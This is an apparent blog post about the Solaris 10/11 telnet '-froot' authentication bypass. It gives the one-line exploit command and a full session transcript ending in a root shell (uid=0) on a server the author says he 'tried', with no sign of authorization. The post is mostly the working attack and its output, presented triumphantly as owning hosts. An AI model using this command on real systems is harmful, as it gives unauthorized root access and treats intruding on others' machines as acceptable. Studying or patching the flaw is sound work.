Solaris: Got Root, if telnet’s enabled!

Just learned today that if Solaris 10 or 11 is installed and root login for telnet is enabled, you are owned! Yes — Owned!!

Credit goes to: http://riosec.com, who was rightfully Slashdotted!

Here is the output from one of the servers I tried:


===> swinful@swinful2> telnet -l "-froot" poor.security-host.com
Trying xxx.xxx.xxx.xxx...
Connected to poor.security-host.com.
Escape character is '^]'.
[ Trying mutual KERBEROS5 (host/poor.security-host.com@SECURITY-HOST.COM)... ]
Kerberos V5: mk_req failed (No such file or directory)
[ Trying KERBEROS5 (host/poor.security-host.com@SECURITY-HOST.COM)... ]
Kerberos V5: mk_req failed (No such file or directory)
Last login: Mon Jan 1 20:25:16 from yyy.yyy.yyy.yyy
In /etc/profile -bash
Sun Microsystems Inc. SunOS 5.10 Generic January 2005
You have new mail.
-bash-3.00# uname -a
SunOS poor 5.10 Generic_118833-03 sun4u sparc SUNW,Sun-Fire-V490
-bash-3.00# id
uid=0(root) gid=0(root)
-bash-3.00# exit
logout
Connection closed by foreign host.
